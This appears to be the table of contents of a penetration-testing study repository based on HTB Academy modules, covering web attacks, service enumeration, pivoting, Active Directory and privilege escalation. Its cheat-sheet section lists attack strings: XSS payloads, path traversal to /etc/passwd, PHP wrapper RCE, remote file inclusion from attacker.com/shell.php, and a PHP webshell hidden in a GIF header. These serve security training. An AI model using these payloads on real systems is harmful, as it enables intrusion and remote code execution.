- 🌐 Subdomain Enumeration & DNS Discovery
- 🔧 Web Application Enumeration
- 📋 Web Information Gathering Overview
- 🔥 Cross-Site Scripting (XSS)
- 🌐 Web Attacks
- 📁 File Inclusion
- 📤 File Upload Attacks
- ⚡ Command Injection
- 🌐 Web Attacks
- 📂 FTP Enumeration
- 🔗 SMB Enumeration
- 📁 NFS Enumeration
- 📧 SMTP Enumeration
- 📮 Email Services (IMAP/POP3)
- 📊 SNMP Enumeration
- ⚙️ IPMI Enumeration
- 📁 FTP Attacks
- 🔗 SMB Attacks
- 🗄️ SQL Database Attacks
- 🌐 DNS Attacks
- 🖥️ RDP Attacks
- 📧 Email Services Attacks (SMTP/IMAP/POP3)
- 🎯 Skills Assessment - Complete Attack Chain Scenarios
- WordPress Discovery & Enumeration
- WordPress Attacks & Exploitation
- Joomla Discovery & Enumeration
- Joomla Attacks & Exploitation
- Drupal Discovery & Enumeration
- Drupal Attacks & Exploitation
- Tomcat Discovery & Enumeration
- Tomcat Attacks & Exploitation
- Jenkins Discovery & Enumeration
- Jenkins Attacks & Exploitation
- Splunk Discovery & Enumeration
- Splunk Attacks & Exploitation
- GitLab Discovery & Enumeration
- PRTG Network Monitor Attacks
- Common Gateway Interface (CGI) - Shellshock
- IIS Tilde Enumeration
- ColdFusion Discovery & Enumeration
- 📋 Module Overview
- 🔧 SSH Tunneling Complete Guide
- 🌐 Dynamic Port Forwarding
- 🔄 Remote Port Forwarding
- ⚡ Chisel SOCKS5 Tunneling
- 🛡️ SSHuttle Pivoting
- 🎯 Meterpreter Tunneling
- 🔗 Socat Redirection
- 🪟 Plink Windows Pivoting
- ⚙️ Netsh Port Forwarding
- 🔌 SocksOverRDP
- 🕸️ Rpivot Web Pivoting
- �� DNS Tunneling with dnscat2
- 📡 ICMP Tunneling with ptunnel-ng
- �� Complete Skills Assessment
- 🔍 Initial Domain Enumeration
- ☣️ LLMNR/NBT-NS Poisoning from Linux
- 🪟 LLMNR/NBT-NS Poisoning from Windows
- 🔐 Password Policy Enumeration
- 👥 Password Spraying - Target User Lists
- 🐧 Password Spraying from Linux
- 🪟 Password Spraying from Windows
- 🛡️ Security Controls Enumeration
- 🐧 Credentialed Enumeration from Linux
- 🪟 Credentialed Enumeration from Windows
- 🏴☠️ Living Off the Land
- 🎫 Kerberoasting from Linux
- 🎫 Kerberoasting from Windows
- 🔑 ACL Enumeration
- 🎯 ACL Abuse Tactics
- 💎 DCSync Attack
- 🔐 Privileged Access
- 🎭 Kerberos "Double Hop" Problem
- ⚡ Bleeding Edge Vulnerabilities
- 🔧 Miscellaneous Misconfigurations
- 🔗 Domain Trusts Primer
- ⬆️ Child → Parent Trust Attacks
- 🐧 Child → Parent Trust Attacks - from Linux
- 🌲 Cross-Forest Trust Abuse - from Windows
- 🐧 Cross-Forest Trust Abuse - from Linux
- 🎯 Skills Assessment Part I - Complete Walkthrough
- 🚀 Skills Assessment Part II - Advanced Professional Methodology
- 🪟 Windows File Transfers
- 🐧 Linux File Transfers
- 💻 Code-Based File Transfers
- 🔀 Miscellaneous File Transfers
- 🛡️ Protected File Transfers
- 🎯 Living off the Land Transfers
- 🔍 File Transfer Detection
- 📋 Module Overview
- 🔍 Situational Awareness
- 📊 Initial Enumeration
- 🔄 Communication with Processes
- 🥔 SeImpersonate & SeAssignPrimaryToken
- 🔍 SeDebugPrivilege
- 🏠 SeTakeOwnershipPrivilege
- 🏛️ Windows Built-in Groups
- 📋 Event Log Readers
- 🌐 DnsAdmins
- 💻 Hyper-V Administrators
- 🖨️ Print Operators
- 🖥️ Server Operators
- 🛡️ UAC Bypass
- 🔐 Weak Permissions
- 💣 Kernel Exploits
- ⚡ Vulnerable Services
- 🔑 Credential Hunting
- 📁 Other Files
- 🕵️ Further Credential Theft
- 🚪 Citrix Breakout
- 👥 Interacting with Users
- 🎯 Pillaging
- 🔧 Miscellaneous Techniques
- 🖥️ Windows Server 2008
- 💻 Windows 7 Exploitation
- 📋 Module Overview
- 🔍 Environment Enumeration
- 🔧 Services & Internals Enumeration
- 🔍 Credential Hunting
- 🛤️ PATH Abuse
- 🌟 Wildcard Abuse
- 🚪 Escaping Restricted Shells
- 🔐 Special Permissions
- ⚡ Sudo Rights Abuse
- 👑 Privileged Groups
- 🎭 Capabilities
- ⚙️ Vulnerable Services
- ⏰ Cron Job Abuse
- 🐳 LXD Container Escape
- 🐋 Docker Container Escape
- 📜 Logrotate Exploitation
- 🔧 Miscellaneous Techniques
- 📚 Shared Libraries
- 🎯 Shared Object Hijacking
- 🐍 Python Library Hijacking
- 🚨 Sudo CVE Exploits
- 🔐 Polkit/Pwnkit
- 💧 Dirty Pipe
- 🌐 Netfilter Kernel Exploits (Advanced)
- 🛡️ Linux Hardening
- 📝 Notetaking & Organization
- 📊 Types of Reports
- 📋 Components of a Report
- 🔍 How to Write Up a Finding
- 🛠️ Reporting Tips and Tricks
- 📁 HTB Academy Example
- [📋 Administrative Information](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Notes/1. Administrative Information.md)
- [🎯 Attack Path Documentation](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Notes/11. Attack Path.md)
- [🔐 Credentials Tracking](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Notes/6. Credentials.md)
- [📊 Findings Summary](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Notes/12. Findings.md)
- [🔴 Example High Finding - Kerberoasting](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Findings/H1 - Kerberoasting.md)
- [🟡 Example Medium Finding - File Shares](documentation-reporting/HTB_Academy_EXAMPLE/Inlanefreight Penetration Test/Evidence/Findings/M1 - Insecure File Shares.md)
- 🔍 External Information Gathering
- ⚔️ Service Enumeration & Exploitation
- 🌐 Web Enumeration & Exploitation
- 🚀 Initial Access
- 🔒 Post-Exploitation Persistence
- 🔍 Internal Information Gathering
- ⚔️ Exploitation & Privilege Escalation
- 🔄 Lateral Movement
- 👑 Active Directory Compromise
- 🏆 Post-Exploitation
- 🎫 NTDS.dit Extraction & Analysis
- 🔍 Username Enumeration & OSINT
- 🗡️ Dictionary & Brute Force Attacks
- ⚔️ Pass-the-Hash Techniques
- 🔧 Registry Hive Attacks (SAM, SYSTEM, SECURITY)
- 🧠 LSASS Memory Dumping
- 💾 Credential Manager Attacks
- 🕵️ Credential Hunting in Windows
- 🔌 Network Services Brute Force
- 📁 Protected File Cracking
- 🌐 Network Traffic Credential Hunting
- 📂 Network Shares Credential Hunting
- 🔑 Pass the Hash (PtH) Attacks
- 🎫 Pass the Ticket (PtT) Attacks
- 📜 Pass the Certificate (ESC8 & ADCS Attacks)
- 🐧 Pass the Ticket from Linux
- DNS Tools - dig, dnsenum, amass, puredns for subdomain discovery
- Web Enumeration - gobuster, ffuf, whatweb for content discovery
- CMS Tools - wpscan, joomscan, droopescan for specific platforms
- Parameter Discovery - arjun, paramspider, ffuf for hidden parameters
- XSS Types - Stored (persistent), Reflected (non-persistent), DOM-based (client-side)
- XSS Tools - XSStrike, BruteXSS, Burp Suite, OWASP ZAP
- Basic Payloads -
<script>alert(1)</script>,<img src=x onerror=alert(1)> - Cookie Stealing -
<script>alert(document.cookie)</script> - LFI Techniques - Path Traversal (
../../../etc/passwd), PHP Wrappers (php://filter) - LFI Bypasses - Non-recursive (
....//), URL encoding (%2e%2e%2f), Approved paths (./languages/../../../) - PHP Filters - Source code disclosure (
php://filter/read=convert.base64-encode/resource=config) - PHP Fuzzing -
ffuf -u http://target.com/FUZZ.php, common files (config.php,database.php) - PHP Wrappers RCE - Data (
data://text/plain;base64,BASE64), Input (php://input+ POST), Expect (expect://id) - RCE Requirements -
allow_url_include = On(data/input),expectextension (expect wrapper) - Remote File Inclusion (RFI) - HTTP (
http://attacker.com/shell.php), FTP (ftp://attacker.com/shell.php), SMB (\\attacker.com\share\shell.php) - RFI Servers - Python HTTP (
python3 -m http.server 80), FTP (python3 -m pyftpdlib -p 21), SMB (impacket-smbserver) - File Upload + LFI - Malicious images (
GIF8<?php system($_GET["cmd"]); ?>), Zip (zip://file.jpg#shell.php), Phar (phar://file.jpg/shell.txt) - Upload Paths -
/uploads/,/profile_images/,/assets/images/, path discovery via source inspection - Log Poisoning - Session (
/var/lib/php/sessions/sess_ID), Apache (/var/log/apache2/access.log+ User-Agent), SSH (/var/log/auth.log) - Process Poisoning -
/proc/self/environ,/proc/self/fd/Nvia User-Agent header injection - Automated Scanning - Parameter fuzzing (
ffuf+burp-parameter-names.txt), LFI wordlists (LFI-Jhaddix.txt), Server discovery - LFI Tools -
liffy,LFISuite,dotdotpwn,kadimus, custom automation scripts - File Inclusion Module - 9 specialized guides: Basic LFI → Advanced Bypasses → PHP Wrappers → RFI → File Upload → Log Poisoning → Automated Tools → Prevention → Skills Assessment
- LFI Techniques - Path traversal, PHP filters (
base64-encode), Wrapper RCE (data://,php://input,expect://) - RFI Protocols - HTTP, FTP, SMB remote file inclusion for direct RCE
- Log Poisoning - Session, Apache, SSH, Mail, FTP log contamination for RCE
- PHP Security -
disable_functions,open_basedir,allow_url_include=Off, Container isolation - Skills Assessment - Multi-technique chain: PHP filters → Hidden admin → LFI → Log poisoning → RCE → Flag extraction
- MySQL - Port 3306, default credentials, SQL injection
- MSSQL - Port 1433, Windows authentication, xp_cmdshell
- Oracle TNS - Port 1521, SID enumeration, privilege escalation
- FTP - Port 21, anonymous access, file upload/download
- SMB - Ports 139/445, share enumeration, EternalBlue (CVE-2017-0144)
- NFS - Port 2049, share mounting, UID/GID manipulation
- SMTP - Port 25, user enumeration, open relay testing
- IMAP/POP3 - Ports 143/993/110/995, certificate analysis
- SNMP - Port 161, community strings, OID enumeration
- IPMI - Port 623, hash extraction, cipher zero vulnerability
- SSH - Port 22, key-based authentication, tunneling
- RDP - Port 3389, BlueKeep vulnerability, certificate analysis
- WinRM - Ports 5985/5986, PowerShell remoting, authentication bypass
- WMI - Port 135, remote queries, persistence mechanisms
- Firewall and IDS/IPS Evasion
- Footprinting
- Host-Based Enumeration
- Web Application Information Gathering
- Attacking Common Services (Complete - 7 documents, 4,262 lines)
- Attacking Common Applications (Complete - 22 documents covering CMS, Development Tools, Infrastructure Monitoring, and Specialized Applications)
- Cross-Site Scripting (XSS) (Complete - HTB Academy guide with all XSS types and techniques)
- File Inclusion (Complete - HTB Academy module with 9 specialized guides: Basic LFI, Advanced Bypasses, PHP Wrappers RCE, RFI, File Upload + LFI, Log Poisoning, Automated Scanning, Prevention & Hardening, Skills Assessment)
- File Upload Attacks (Complete - 9 specialized guides covering all upload attack vectors and bypass techniques)
- Command Injection (Complete - 10 comprehensive sections with detection, exploitation, and advanced evasion techniques)
- Web Attacks (Complete - HTTP Verb Tampering, IDOR, XXE Injection with Skills Assessment)
- Pivoting, Tunneling & Port Forwarding (Complete - 14 specialized guides covering all tunneling protocols and techniques)
- Active Directory Enumeration & Attacks (Complete - 25 comprehensive guides covering all AD attack vectors and lateral movement)
- Vulnerability Assessment
- Password Attacks
- SQL Injection (Advanced)
- Network Enumeration
- Privilege Escalation
- Lateral Movement
- Post-Exploitation